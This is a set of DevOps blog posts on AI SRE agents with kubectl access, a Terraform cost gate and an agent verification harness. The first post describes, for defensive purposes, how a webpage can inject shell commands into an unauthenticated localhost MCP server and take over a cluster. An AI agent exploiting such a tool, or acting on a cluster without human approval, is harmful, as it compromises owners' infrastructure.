DEV Community: Mateen Anjum

I Gave an AI Agent kubectl Access to My Cluster. Here's What Nobody Tells You About AI SRE

Mateen Anjum — Wed, 01 Jul 2026 21:48:14 +0000

TL;DR: An AI agent can genuinely help during an incident, but the demos skip the three hard parts: it only reasons as well as the telemetry it can retrieve, it can only fix anything if you give it write access, and the exact "give your agent kubectl" pattern everyone is copying just shipped a critical RCE (CVE-2025-65719) where one webpage visit compromises the whole cluster. Here's where the line actually is.

The demo that made me try it

You've seen the demo by now. Someone pastes an alert into a chat box, an agent fans out across logs and metrics, and thirty seconds later it says "the checkout latency spike started at 14:32, right after commit abc123 shipped a bad session-cache change, here's the rollback." The room claps.

I wanted that. I run on-call for production Kubernetes, and the 3 AM "which of forty services is actually on fire" problem is real. So I wired an agent into a cluster with an MCP server, gave it the usual read access, and started throwing incidents at it.

It's useful. I'll say that up front so nobody thinks this is a hit piece. But the gap between the demo and a thing you'd trust in production is enormous, and it's made of three walls the demos never show you.

Wall 1: The agent is only as smart as the telemetry it can reach

Here's the part the marketing quietly skips. An "AI SRE" isn't magic reasoning. It's an LLM doing retrieval-augmented generation over your data: logs, metrics, recent deploys, runbooks, and a service topology that says "checkout calls payment-gateway calls auth-db." Retrieve that context, inject it into the prompt, get a cited answer back.

incident.io, who sell one of these, are refreshingly blunt about it: without RAG anchoring the model to your specific infrastructure, "you're getting pattern-matched guesses, not investigated findings." That's the whole ballgame. The agent's ceiling is your observability, not the model.

Now look at your actual stack. Are your runbooks current, or are half of them a Confluence page last touched in 2023? Is there a real service catalog encoding dependencies, or does that graph live in one senior engineer's head? Are deploys correlated with metrics anywhere a machine can query, or do you eyeball Datadog next to GitHub in two tabs?

For most teams the honest answer is "partial, stale, and scattered." Feed that to an LLM and you don't get "I don't know." You get a confident, well-written root cause that's wrong, with citations to the stalest doc in the pile. The failure mode of a bad AI SRE isn't silence. It's plausible fiction at 3 AM, which is worse than no answer because it sends you chasing the wrong fix.

So the real prerequisite for AI SRE isn't a subscription. It's observability hygiene you probably haven't finished. If your telemetry is a mess, the agent industrializes that mess.

Wall 2: To fix anything, it needs hands. That's where it gets dangerous.

Reading is safe. The moment the demo gets exciting is the moment the agent stops suggesting a rollback and starts doing one. That requires write access to your cluster: kubectl apply, kubectl rollout undo, kubectl scale. Real credentials, real blast radius.

The common way to grant that today is an MCP server, a small process that exposes cluster operations to an AI assistant over natural language. And in May 2026, OX Security published CVE-2025-65719: a critical remote code execution in the popular kubectl-mcp-server project, all versions below 1.2.0.

The attack is almost insultingly simple, and it's worth understanding because it generalizes:

Your engineer has the MCP server running in the background on their laptop. Normal. That's how they let their assistant talk to the cluster.
The server listens on localhost and, in the vulnerable versions, shells out to run commands with Python's subprocess using shell=True, unauthenticated.
The engineer visits a malicious webpage. Just visits it. The page's JavaScript POSTs to localhost, hits the MCP server, and injects arbitrary shell commands.
Those commands run on the laptop, with that laptop's kubeconfig. Full cluster compromise: secrets, ConfigMaps, service accounts, the ability to deploy malicious pods and pivot into the rest of your cloud.
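To make the shell=True problem concrete, here is a minimal sketch of the safer shape: build an argument list from allow-listed pieces and never hand a string to a shell. The allow-lists and the helper names (build_kubectl_argv, run_kubectl) are hypothetical and are not taken from kubectl-mcp-server or its patch.

```python
import subprocess

# Hypothetical allow-lists for illustration only.
ALLOWED_VERBS = {"get", "describe"}
ALLOWED_RESOURCES = {"pods", "deployments", "events", "replicasets"}


def build_kubectl_argv(verb: str, resource: str, namespace: str) -> list[str]:
    """Return an argv list for kubectl, rejecting anything off the allow-list."""
    if verb not in ALLOWED_VERBS:
        raise ValueError(f"verb not allowed: {verb!r}")
    if resource not in ALLOWED_RESOURCES:
        raise ValueError(f"resource not allowed: {resource!r}")
    # Namespaces are restricted to letters, digits, and hyphens here.
    if not namespace.replace("-", "").isalnum():
        raise ValueError(f"suspicious namespace: {namespace!r}")
    return ["kubectl", verb, resource, "--namespace", namespace]


def run_kubectl(verb: str, resource: str, namespace: str) -> str:
    """Run kubectl without a shell, so metacharacters are never interpreted."""
    argv = build_kubectl_argv(verb, resource, namespace)
    # Passing a list (and leaving shell=False) means no shell parsing happens.
    result = subprocess.run(
        argv, capture_output=True, text=True, check=True, timeout=30
    )
    return result.stdout
```

An input like "pods; curl evil.example | sh" never reaches a shell in this shape; it fails the allow-list check first. This does nothing about the missing authentication, which is a separate fix.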

Sit with the shape of that. You didn't get phished into typing credentials. You didn't run a bad binary. You browsed the web while a helpful little server sat on localhost holding the keys to production. The disclosure timeline is its own lesson: reported November 2025, patched January 2026, publicly detailed in May. There was a long window where a lot of clusters were one bad tab away from takeover.

The point isn't "this one project was sloppy," though shell=True on an unauthenticated localhost listener is genuinely rough. The point is structural. The instant you give an agent hands, you create a new attack surface, and it usually lives on an engineer's laptop next to their browser and their cluster credentials. Every tool that grants write access is a candidate for the same class of bug. CVE-2025-65719 is just the first one with a catchy number.

Wall 3: The economics only work for the boring half

Say your telemetry is clean and you've locked the access down. Does the math work?

It depends entirely on which job you're buying. The two halves of "AI SRE" have wildly different returns:

Investigation and documentation: This is real, measurable ROI today. Auto-drafting a post-mortem turns roughly 90 minutes of Slack-scrollback reconstruction into about 10 minutes of editing. Correlating a metric spike with the deploy that caused it, with a citation you can verify in 30 seconds, genuinely compresses time-to-identify. If your team runs 18 incidents a month, saving 80 minutes on each post-mortem adds up to about 24 hours a month.
Autonomous remediation: This is where the demos live and the value doesn't. Even the vendors selling it will tell you, if you read past the headline, that autonomous production action "remains limited" and needs a human in the loop.

And the running cost isn't trivial. These agents burn tokens fanning out across large log corpora, and observability data volume is the real cost driver, not seat licenses. One publicly discussed multi-agent SRE setup was reported to run close to €8,500 a month in production (see the r/sre write-ups). Vendors are quiet about absolute numbers for a reason. You're paying for the agent and for keeping enough clean telemetry queryable for it to be worth anything.

So the honest framing: you're mostly paying real money to automate investigation and paperwork, which is worth it, while the part that looked like the future stays behind a human approval gate.

Where it actually earns its keep

I don't want to leave you with "AI SRE is fake." It isn't. It's just narrower than the pitch. After running it against real incidents, here's where it consistently pays off:

Triage and severity classification. "Database CPU High" might be a P1 or a scheduled backup. An agent with access to past incidents and service context routes that correctly and cuts pages.
Parallel root-cause correlation. It tests several hypotheses at once across the full log history, something you do sequentially and slowly at 3 AM. It surfaces the likely culprit; you verify.
Post-mortem and timeline drafting. The single most reliable win. Let it reconstruct the timeline from alerts, deploys, and chat, then you edit.

The mental model that survives contact with production is the "glass box." A black box says "the root cause is a memory leak in auth-service" and you have no idea why it thinks that. A glass box says "based on this log line at 14:31 showing auth-service memory at 98%, correlated with this commit that changed session caching, the likely cause is the cache not evicting" with both sources linked. You verify in half a minute. If a vendor can't show the citation trail, walk away.
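One way to enforce the glass-box idea in your own tooling is to refuse any finding that arrives without sources. The sketch below is an assumption about how you might model that, not any vendor's schema. Evidence, Finding, and is_glass_box are hypothetical names, and the source strings are placeholders.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Evidence:
    source: str       # placeholder for a log query link or commit URL
    observed_at: str  # timestamp as reported by the source
    excerpt: str      # the line or diff summary the claim rests on


@dataclass
class Finding:
    hypothesis: str
    evidence: list[Evidence] = field(default_factory=list)

    def is_glass_box(self, min_sources: int = 2) -> bool:
        """True only if the hypothesis cites enough distinct, non-empty sources."""
        distinct = {e.source for e in self.evidence if e.source.strip()}
        return len(distinct) >= min_sources


black_box = Finding("memory leak in auth-service")
glass_box = Finding(
    "session cache is not evicting",
    evidence=[
        Evidence("auth-service logs (placeholder link)", "14:31", "memory at 98%"),
        Evidence("session caching commit (placeholder link)", "14:30", "cache change"),
    ],
)
```

Here black_box.is_glass_box() is False and glass_box.is_glass_box() is True, so a pipeline can drop or flag the first before a human ever reads it.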

Here's that pattern on a real cluster I broke on purpose. A read-only agent pulls the symptom, the warning event, and the change that caused it, then hands you a hypothesis you can check against the actual commit:

And the operating pattern that keeps you safe is three steps, not one:

The agent proposes with evidence. A human approves. Then the action executes through a scoped, audited path. AI drafts the rollback PR; you click the button. Never let the middle step disappear, no matter how good the suggestions get.
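The propose, approve, execute sequence can be sketched as a tiny state machine in which execution is impossible without a recorded approval. This is an illustration under my own assumptions. The Action class and its fields are hypothetical, and the runner is whatever scoped, audited path you already have.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable


class State(Enum):
    PROPOSED = "proposed"
    APPROVED = "approved"
    EXECUTED = "executed"


@dataclass
class Action:
    command: list[str]
    citations: list[str]
    state: State = State.PROPOSED
    audit: list[str] = field(default_factory=list)

    def approve(self, human: str) -> None:
        """A human signs off; proposals without evidence cannot be approved."""
        if self.state is not State.PROPOSED:
            raise RuntimeError(f"cannot approve from state {self.state.value}")
        if not self.citations:
            raise ValueError("refusing to approve an action with no citations")
        self.state = State.APPROVED
        self.audit.append(f"approved by {human}")

    def execute(self, runner: Callable[[list[str]], None]) -> None:
        """Run the command only after approval, and record that it ran."""
        if self.state is not State.APPROVED:
            raise PermissionError("action has not been approved by a human")
        runner(self.command)
        self.state = State.EXECUTED
        self.audit.append("executed: " + " ".join(self.command))
```

The useful property is that the middle step cannot be skipped by accident: calling execute on a fresh proposal raises instead of running.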

If you're going to do this anyway, do this

You probably are going to try it, so here's the short list that keeps it from becoming CVE-2025-65719 in your environment:

Read-only by default. The agent's service account should get get, list, watch and nothing else until you have a specific reason otherwise. A minimal Role:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ai-sre-readonly
  namespace: production
rules:
  - apiGroups: ["", "apps"]
    resources: ["pods", "deployments", "events", "replicasets"]
    verbs: ["get", "list", "watch"]

Bind that to a dedicated ai-sre-readonly ServiceAccount. No create, update, delete, patch. No secrets read unless you truly need it, and if you do, scope it to named resources. kubectl auth can-i makes the boundary concrete, and this is the actual output from that service account:

Never expose the MCP server to the network. Bind to localhost only, require authentication or an API key even locally, and treat any "direct web access" convenience feature as a liability. The whole CVE hinged on an unauthenticated localhost listener a webpage could reach.
Patch and pin. If you're on kubectl-mcp-server, be on 1.2.0 or later. Treat MCP servers like any other privileged dependency: watch their advisories, pin versions, scan them.
Keep the human approval gate for every write. Propose, approve, execute. Put writes behind a PR or an explicit confirmation, and log every action to an audit trail with the citations that justified it.
Fix observability first. If your runbooks are stale and your topology lives in someone's head, spend the money there before you spend it on an agent. The agent multiplies whatever data quality you already have, in both directions.
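The read-only boundary from the first item can also be sanity-checked offline before you apply anything. The sketch below re-evaluates the Role's rules in plain Python. It is a deliberately simplified model (no wildcards, resourceNames, or subresources), the allowed helper is hypothetical, and it does not replace running kubectl auth can-i against the real cluster.

```python
# Rules copied from the ai-sre-readonly Role above.
ROLE_RULES = [
    {
        "apiGroups": ["", "apps"],
        "resources": ["pods", "deployments", "events", "replicasets"],
        "verbs": ["get", "list", "watch"],
    }
]


def allowed(verb: str, resource: str, api_group: str = "", rules=ROLE_RULES) -> bool:
    """Return True if any rule grants the verb on the resource in that API group."""
    return any(
        api_group in rule["apiGroups"]
        and resource in rule["resources"]
        and verb in rule["verbs"]
        for rule in rules
    )


checks = {
    "get pods": allowed("get", "pods"),
    "list deployments": allowed("list", "deployments", "apps"),
    "delete pods": allowed("delete", "pods"),
    "get secrets": allowed("get", "secrets"),
}
```

Under this model the first two checks come back True and the last two False, which is the shape you want to see from the real service account as well.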

The actual takeaway

"AI SRE" isn't a colleague you hire. It's a very fast, very literal junior engineer who reads every log in milliseconds, has no intuition, will state a wrong answer with total confidence, and, if you're careless, hands its cluster credentials to the first website you visit.

Point it at investigation and documentation, keep it in a glass box, make it propose while a human approves, and scope its access like you'd scope a service you don't trust, because you shouldn't. Do that and it's a real force multiplier on the worst night of your quarter. Skip it and you've built a confident fiction generator with root on your cluster.

The technology is further along than the skeptics think and much further from autonomous than the demos imply. The engineering job, same as it ever was, is knowing exactly where that line sits.

FinOps guardrails at provisioning time: stop paying for mistakes you could have blocked in Terraform

Mateen Anjum — Sat, 06 Jun 2026 22:07:14 +0000

TL;DR: I wired Infracost into terraform plan, fed the JSON into OPA via conftest, and made the PR check fail if the change adds more than $500/month. Three months in, the gate has blocked roughly $2,400/month of accidental NAT Gateways, oversized RDS instances, and lonely Elastic IPs that nobody noticed. The invoice doesn't arrive anyway when the bad config never merges.

The problem nobody owns

The classic FinOps story goes like this. Someone opens a PR. The PR adds a NAT Gateway because the new VPC needed private subnet egress. Reviewer says "lgtm." It merges. Thirty days later, a finance person pings the platform channel: "what is this $1,847 line item." Nobody remembers the PR. Nobody owns the cost.

The 2026 platform engineering trend reports show that 73% of platform teams have moved cost visibility left, away from the invoice and into the PR.¹ That number tracks with what I'm seeing in the field. The teams that still treat FinOps as a quarterly cleanup exercise are the same teams that get surprised every month.

I built CICosts last year for the same reason at the CI layer: you can't fix what you can't see, and finance asking the question is too late. This article is the same idea pushed one layer down, at the provisioning layer, where the money actually gets committed.

The anti-pattern: "the invoice arrives anyway"

Before I show the gate, the thing it replaces. Most FinOps tooling sold in 2024 to 2025 was retrospective. You buy a SaaS, it ingests your Cost and Usage Report, it shows you pretty graphs of where the money went last month. That's fine for reporting. It does not stop a single dollar from being spent.

The pattern I keep seeing:

Platform team installs a cost dashboard.
Dashboard shows last month's spend, broken down by tag.
Team holds a "cost review" once a quarter.
Team writes tickets to delete the obvious waste.
By the time anyone deletes the resource, it has been running for 60 to 90 days.

The invoice arrives anyway. The dashboard is a receipt, not a guardrail. You can stare at a Grafana panel showing $4,000/month of idle NAT Gateways for as long as you want; the money already left the building.

The fix is to put the question in the developer's face at PR time, when they still have the keyboard and the context.

The gate, end to end

The pipeline has three moving parts. Terraform produces the plan. Infracost converts the plan into a JSON breakdown with monthly costs. OPA reads the breakdown and decides whether the PR check passes.

Step 1: terraform plan

Nothing exotic here. The CI job runs:

terraform init -backend-config=backend.hcl
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json

The tfplan.json is what Infracost wants. Keep the binary plan too, because some teams like to attach it to the PR for review.

Step 2: Infracost breakdown

Infracost reads the plan and looks up prices from its pricing API. It supports AWS, Azure, GCP, and a long tail of SaaS providers. The interesting flag is --format json, which gives a structured diff you can feed into a policy engine.

infracost breakdown \
  --path tfplan.json \
  --format json \
  --out-file infracost.json

The output has a top-level projects[].diff.totalMonthlyCost field. That's the number I care about. A small sample:

{
  "projects": [
    {
      "name": "platform/networking",
      "diff": {
        "totalMonthlyCost": "612.34",
        "resources": [
          {
            "name": "aws_nat_gateway.private_egress",
            "monthlyCost": "32.85",
            "monthlyQuantity": "730",
            "unit": "hours"
          },
          {
            "name": "aws_db_instance.analytics",
            "monthlyCost": "579.49"
          }
        ]
      }
    }
  ]
}

You can see exactly what's driving the delta. That analytics RDS instance is the suspicious one. The NAT Gateway is fine on its own; the problem is usually that someone adds three of them because the module spins one up per AZ.
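If you want to see the drivers ranked before any policy runs, a few lines of Python over the same JSON will do it. This is a minimal sketch that assumes the report has the shape of the sample above. cost_drivers is a hypothetical helper, not part of Infracost.

```python
import json
from decimal import Decimal

# The sample report from above, trimmed to the fields this sketch reads.
SAMPLE = """
{
  "projects": [
    {
      "name": "platform/networking",
      "diff": {
        "totalMonthlyCost": "612.34",
        "resources": [
          {"name": "aws_nat_gateway.private_egress", "monthlyCost": "32.85"},
          {"name": "aws_db_instance.analytics", "monthlyCost": "579.49"}
        ]
      }
    }
  ]
}
"""


def cost_drivers(report: dict) -> list[tuple[str, Decimal]]:
    """Return (resource name, monthly cost) pairs, most expensive first."""
    rows = []
    for project in report.get("projects", []):
        for res in project.get("diff", {}).get("resources", []):
            # Costs arrive as strings; Decimal avoids float rounding on money.
            rows.append((res["name"], Decimal(res.get("monthlyCost") or "0")))
    return sorted(rows, key=lambda row: row[1], reverse=True)


drivers = cost_drivers(json.loads(SAMPLE))
total = sum(cost for _, cost in drivers)
```

With the sample, the RDS instance sorts first and the two resources sum to the 612.34 total, which is a cheap consistency check on the report itself.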

Step 3: OPA policy via conftest

Conftest is a thin wrapper around OPA that lets you write Rego against any structured config file. I keep the policy in policy/cost.rego:

package main

# Hard limit: any PR that adds more than $500/mo of net cost fails.
threshold_monthly := 500

# Allow-list: resource types exempt from the per-resource cap below.
# Example use: temporarily add a type such as aws_db_instance when bumping
# an existing prod RDS up one size during incident response.
exempt_resource_types := {
  "aws_cloudwatch_log_group",
}

deny[msg] {
  delta := to_number(input.projects[_].diff.totalMonthlyCost)
  delta > threshold_monthly
  msg := sprintf(
    "Monthly cost delta is $%.2f, which exceeds the $%d limit. Break this into smaller changes or request an exception.",
    [delta, threshold_monthly],
  )
}

# Block any single resource over $200/mo without a justification label.
deny[msg] {
  some i, j
  resource := input.projects[i].diff.resources[j]
  cost := to_number(resource.monthlyCost)
  cost > 200
  not exempt_resource_types[resource.resourceType]
  not has_justification(resource)
  msg := sprintf(
    "Resource %s costs $%.2f/mo. Add a # cost-justified: <reason> comment in the .tf file or split the PR.",
    [resource.name, cost],
  )
}

has_justification(resource) {
  startswith(resource.metadata.code_comment, "cost-justified:")
}

Two rules, both opinionated. The aggregate cap stops "death by a thousand cuts" PRs that ship 20 resources at $50 each. The per-resource cap stops one fat outlier (over $200 but under the $500 total) from sneaking past the aggregate check.
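To unit-test the thresholds without a Rego toolchain, the two caps can be mirrored in Python. This is a simplified sketch, not a port of the policy. It leaves out the exemption list and the justification check, and violations is a hypothetical helper.

```python
from decimal import Decimal

THRESHOLD_MONTHLY = Decimal("500")  # aggregate cap per PR
PER_RESOURCE_CAP = Decimal("200")   # cap on any single resource


def violations(report: dict) -> list[str]:
    """Return one message per breached cap, mirroring the two deny rules."""
    msgs = []
    for project in report.get("projects", []):
        diff = project.get("diff", {})
        delta = Decimal(diff.get("totalMonthlyCost", "0"))
        if delta > THRESHOLD_MONTHLY:
            msgs.append(f"aggregate: ${delta} exceeds ${THRESHOLD_MONTHLY}")
        for res in diff.get("resources", []):
            cost = Decimal(res.get("monthlyCost", "0"))
            if cost > PER_RESOURCE_CAP:
                msgs.append(f"resource: {res['name']} costs ${cost}/mo")
    return msgs


# Twenty $50 resources: no single outlier, but the total is $1,000.
many_small = {
    "projects": [
        {
            "diff": {
                "totalMonthlyCost": "1000.00",
                "resources": [
                    {"name": f"res_{i}", "monthlyCost": "50.00"} for i in range(20)
                ],
            }
        }
    ]
}
```

Running violations(many_small) trips only the aggregate rule, which is exactly the case the per-resource cap alone would miss.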

To run it locally:

conftest test --policy policy/ infracost.json

If the policy denies, conftest exits non-zero, which fails the GitHub Actions job, which blocks the merge if you have branch protection on.

Step 4: GitHub Actions workflow

The full workflow lives in .github/workflows/cost-gate.yml:

name: cost-gate

on:
  pull_request:
    paths:
      - 'terraform/**'
      - '.github/workflows/cost-gate.yml'

permissions:
  contents: read
  pull-requests: write
  id-token: write  # required for the OIDC role assumption below

jobs:
  cost-gate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - uses: hashicorp/setup-terraform@v3
        with:
          terraform_version: 1.9.5

      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: ${{ secrets.PLAN_ROLE_ARN }}
          aws-region: us-east-1

      - name: terraform init and plan
        working-directory: terraform
        run: |
          terraform init -input=false
          terraform plan -out=tfplan.binary -input=false
          terraform show -json tfplan.binary > tfplan.json

      - name: Install Infracost
        uses: infracost/actions/setup@v3
        with:
          api-key: ${{ secrets.INFRACOST_API_KEY }}

      - name: Run Infracost
        working-directory: terraform
        run: |
          infracost breakdown \
            --path tfplan.json \
            --format json \
            --out-file ../infracost.json

      - name: Install conftest
        run: |
          curl -L https://github.com/open-policy-agent/conftest/releases/download/v0.55.0/conftest_0.55.0_Linux_x86_64.tar.gz \
            | tar -xz conftest
          sudo mv conftest /usr/local/bin/

      - name: Enforce cost policy
        run: conftest test --policy policy/ infracost.json

      - name: Comment cost diff on PR
        if: always()
        uses: infracost/actions/comment@v3
        with:
          path: infracost.json
          behavior: update

A few things worth calling out. The plan uses a read-only IAM role assumed via OIDC, not a long-lived key. The conftest step is the actual gate; the Infracost PR comment is just a nicety so reviewers can see the breakdown without opening Actions logs. The paths: filter keeps the gate from running on docs-only PRs.

Step 5: Backstage scorecard

The gate is enforcement. The scorecard is visibility. Once you have the cost-gate workflow on every infra repo, you want a place to see which repos pass, which fail, and which never adopted the gate at all.

I use Backstage's Tech Insights module for scorecards. The check definition lives in app-config.yaml:

techInsights:
  factRetrievers:
    costGateRetriever:
      schedule:
        frequency: { hours: 6 }
        timeout: { minutes: 5 }
  scorecards:
    cost-policy-compliance:
      title: "Cost policy compliance"
      description: "Repos with the FinOps gate installed and passing"
      checks:
        - id: has-cost-gate-workflow
          type: json-rules-engine
          name: "Cost gate workflow exists"
          factIds:
            - github.workflows.exists
          rule:
            conditions:
              all:
                - fact: workflows
                  operator: contains
                  value: cost-gate.yml
        - id: cost-gate-passing
          type: json-rules-engine
          name: "Cost gate is passing on main"
          factIds:
            - github.workflows.lastStatus
          rule:
            conditions:
              all:
                - fact: lastStatus
                  operator: equal
                  value: success
        - id: under-monthly-budget
          type: json-rules-engine
          name: "Monthly infra cost under team budget"
          factIds:
            - infracost.monthlyTotal
            - team.monthlyBudget
          rule:
            conditions:
              all:
                - fact: monthlyTotal
                  operator: lessThanInclusive
                  value: { fact: monthlyBudget }

The scorecard surfaces on each component's overview page. Three checks per repo. Green means the gate is installed, the last main run was green, and the projected monthly cost is under whatever budget the team owner set. Anything else is a flag.

The point is not to shame teams. The point is to make non-adoption visible. If 18 of 20 services have the gate and 2 don't, the conversation is now "why don't those 2," not "we should probably do something about cost someday."

Results

Three months of running this on a six-person platform team owning roughly 30 Terraform repos.

Metric	Before	After
Cost surprises per month	2 to 4	0
Time from spend to detection	30 days	~90 seconds
Monthly waste prevented (avg)	n/a	~$2,400
PR cycle time impact	n/a	+47 sec p50
Engineer pushback after week 2	n/a	none

The $2,400/month number comes from summing the blocked deltas across the three months and dividing by three. The largest single block was a developer trying to spin up a db.r6i.4xlarge for a staging workload because the template they copied was production-sized ($1,100/month avoided). Another was a misconfigured module that would have provisioned three NAT Gateways instead of one (about $99/month in hourly charges for the three, two of them unnecessary).

The PR cycle time impact is real but small. The whole gate, including init, plan, and policy eval, runs in under a minute and a half on an ubuntu-latest runner. Nobody has complained about it.

What I would do differently

A few honest notes from running this in production.

Start with a soft fail. The first two weeks, set the conftest step to continue-on-error: true. Just collect data. You'll find PRs that legitimately exceed the threshold (a one-time data warehouse provisioning, a region expansion) and you want to know your real distribution before you draw a line. I drew the line at $500 because that's about the 90th percentile of the PRs I sampled.
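Picking the line from soft-fail data is a percentile calculation. A minimal sketch, assuming you have collected one monthly-cost delta per PR during the soft-fail window; suggest_threshold is a hypothetical helper and the sample numbers are made up for illustration.

```python
import statistics


def suggest_threshold(deltas: list[float], percentile: int = 90) -> float:
    """Return the given percentile of observed per-PR monthly cost deltas."""
    if len(deltas) < 2:
        raise ValueError("need at least two observations")
    if not 1 <= percentile <= 99:
        raise ValueError("percentile must be between 1 and 99")
    # quantiles(n=100) returns the 99 cut points between percentiles.
    cuts = statistics.quantiles(deltas, n=100, method="inclusive")
    return cuts[percentile - 1]


# Made-up deltas from a two-week soft-fail window, in dollars per month.
observed = [0, 12, 18, 25, 40, 55, 90, 140, 310, 480, 2200]
cap = suggest_threshold(observed)
```

Round the result to a number people can remember, and re-run it each quarter with fresh data rather than treating the first answer as permanent.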

Make the exception path easy. A hard cap with no escape valve creates resentment fast. The Rego policy supports a # cost-justified: <reason> HCL comment on individual resources. Use the comment for things you actually want to ship anyway, and the comment becomes an audit trail. Reviewers can ask "is this justification real" without blocking the gate.

Don't tag-shame. I avoided building anything that publicly ranks teams or developers by cost. Cost is correlated with workload, and the team running the data warehouse will always cost more than the team running the marketing site. Build scorecards on policy compliance, not absolute cost.

Re-evaluate the threshold every quarter. Infrastructure changes, your business changes, your tolerance for cost noise changes. The $500 cap that made sense in Q1 might be too tight in Q4 when you're spinning up a new region. Treat the number as a config value, not a constant.

Try it yourself

The full reference repo (Terraform examples, the Rego policy, the workflow, the Backstage scorecard YAML) is in progress at github.com/mateenali66/finops-guardrails-terraform. If you want to copy the policy out of this post and drop it into your own pipeline, you should be 30 minutes from a working gate.

If you also want CI cost visibility on top of provisioning cost visibility, CICosts is the companion piece. Same philosophy, different layer.

¹ The LeanOps and platformengineering.org joint 2026 trend report, "State of Platform Engineering," reports that 73% of surveyed platform teams have introduced cost policy enforcement before merge. Cite the published report when you reference this number in your own work.

Stop Building CI Pipelines For Humans. Your AI Agents Need A Harness.

Mateen Anjum — Mon, 01 Jun 2026 03:02:56 +0000

TL;DR: Your CI pipeline was designed for a human reading red text on GitHub. AI agents need a verification harness: deterministic infra, ephemeral preview environments, OPA blast-radius limits, replay traffic, and a machine-readable verdict. Here is the one I shipped, with code.

A few weeks ago I let a coding agent loose on a real platform team's repo. Terraform, EKS, around 40 microservices. The agent was good. It opened clean PRs, the diffs looked fine, the tests it added were reasonable. By the end of the week it had merged six PRs and we'd rolled back four of them.

The model wasn't the problem. The problem was that everything around the model assumed a human would catch the bad ones. The CI gates were written for someone who could squint at a Grafana panel, remember last Tuesday's outage, and feel uneasy. The agent has no scar tissue. Someone on r/devops put it perfectly back in March: "LLMs optimize for resolve the immediate error without understanding blast radius. A human would've paused after the first networking change went sideways. The agent doesn't have that instinct."

The fix isn't a smarter model. It's what people are starting to call an agent harness: the runtime layer wrapped around the model that gives it deterministic infra to play in, hard limits on what it can break, and a structured signal telling it whether the change worked. The term itself only hit mainstream usage in early 2026, per a recent industry write-up, and most teams I talk to haven't built one yet.

Here is the harness I ended up shipping. It costs roughly $180/month per agent slot on AWS, takes about a day to wire up if you already have Terraform and a GitOps controller, and it has cut bad-merge rollbacks from four a week to zero in the last 17 days.

Five Failure Modes That Hurt Every Time

Same five things keep biting teams. They sound obvious individually. Together they make agents look incompetent.

Flaky preview environments. Same PR, two runs, different results. The agent's last change "worked" because Redis happened to come up first. Next run it doesn't.
No rollback signal. Agent merges. Prod p99 quietly drifts from 180ms to 410ms. Nothing alerts because nothing watches the right thing in a way the agent can read.
Non-deterministic Terraform. Plan looked clean. Apply diverged because a data source resolved differently in the second run. Common with aws_ami lookups, IAM role ARNs, and anything pulling from the registry.
No blast-radius limit. Agent decides the cleanest fix is to delete the VPC. Technically it has permission, because the CI role is admin. Yes, this happened.
No agent-readable test reports. The Cypress run failed. The reason is buried in 4MB of stdout with ANSI color codes. The agent reads 200 lines, gives up, says "tests pass" in the PR comment.
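The last failure mode is the cheapest to fix. A minimal sketch of turning a colored log into something an agent can parse: strip the ANSI escapes, keep only the failing lines, and emit JSON. Matching on "FAIL" and "Error" is a crude heuristic I am assuming for illustration. A runner's own structured reporter is a better source where one exists.

```python
import json
import re

# Matches CSI escape sequences such as the color codes in terminal output.
ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")


def summarize(raw_log: str, max_failures: int = 20) -> str:
    """Reduce a raw test log to a small JSON verdict an agent can read."""
    clean = ANSI_ESCAPE.sub("", raw_log)
    failures = [
        line.strip()
        for line in clean.splitlines()
        if "FAIL" in line or "Error" in line
    ]
    verdict = {
        "passed": not failures,
        "failure_count": len(failures),
        "failures": failures[:max_failures],  # cap so the payload stays small
    }
    return json.dumps(verdict)


raw = "\x1b[31mFAIL\x1b[0m checkout.spec.js\n\x1b[32mok\x1b[0m login.spec.js\n"
report = json.loads(summarize(raw))
```

The point is the size of the payload: a capped list of failures instead of megabytes of stdout, so "gave up after 200 lines" is no longer a possible outcome.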

Northflank wrote up the broader category in their March 2026 piece on ephemeral execution environments for AI agents and most of it tracks. The interesting bit is the gap between "we run agent code in a sandbox" and "the sandbox actually verifies the change."

The Harness

Six components. None of them are new on their own. The trick is wiring them so the agent gets a verdict, not a wall of logs.

1. Lock Terraform Until The Plan Is Reproducible

Every drift complaint I have ever heard starts with a non-pinned provider or an implicit data source. Fix it once:

terraform {
  required_version = "= 1.9.8"

  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "= 5.74.0"
    }
    kubernetes = {
      source  = "hashicorp/kubernetes"
      version = "= 2.33.0"
    }
  }

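  # Backend blocks cannot interpolate variables or terraform.workspace.
  # The S3 backend namespaces state per workspace on its own, storing it at
  # <workspace_key_prefix>/<workspace>/<key>.
  backend "s3" {
    bucket               = "agent-harness-tfstate"
    key                  = "terraform.tfstate"
    workspace_key_prefix = "preview"
    region               = "us-east-1"
    dynamodb_table       = "agent-harness-locks"
    encrypt              = true
  }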
}

# Pin the AMI. Do not look it up at plan time.
data "aws_ami" "eks_node" {
  most_recent = false
  owners      = ["602401143452"]

  filter {
    name   = "image-id"
    values = ["ami-0c2f3d8a17b7d4f91"]
  }
}

The = 1.9.8 style is exact-pin, not ~> 1.9. Agents try to "fix" version constraints; they shouldn't. Run terraform plan -refresh=false -lock-timeout=120s in the harness so a stale data source can't sneak in.

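I also wrap every preview run in a workspace named after the PR number, so state is isolated and teardown is a terraform destroy followed by terraform workspace delete pr-1247 (run from another workspace, since Terraform will not delete the workspace you have selected or one that still tracks resources).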

2. Give The Agent Its Own Ephemeral EKS Namespace, Not Its Own Cluster

Spinning up a fresh EKS cluster per PR is what some Northflank docs suggest. In practice it takes 12 to 15 minutes and burns $0.10/hour just for the control plane. For agent workflows where you want a verdict in under 4 minutes, namespace-per-PR on a warm cluster wins.

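# kustomize/preview/kustomization.yaml
# Kustomize does not expand environment variables; render ${PR_NUMBER}
# first (for example with envsubst) before running kustomize build.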
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization

namespace: pr-${PR_NUMBER}

resources:
  - ../base

patches:
  - target:
      kind: Deployment
    patch: |-
      - op: replace
        path: /spec/replicas
        value: 1
      - op: add
        path: /metadata/labels/preview
        value: "true"
      - op: add
        path: /spec/template/spec/priorityClassName
        value: preview-low

commonAnnotations:
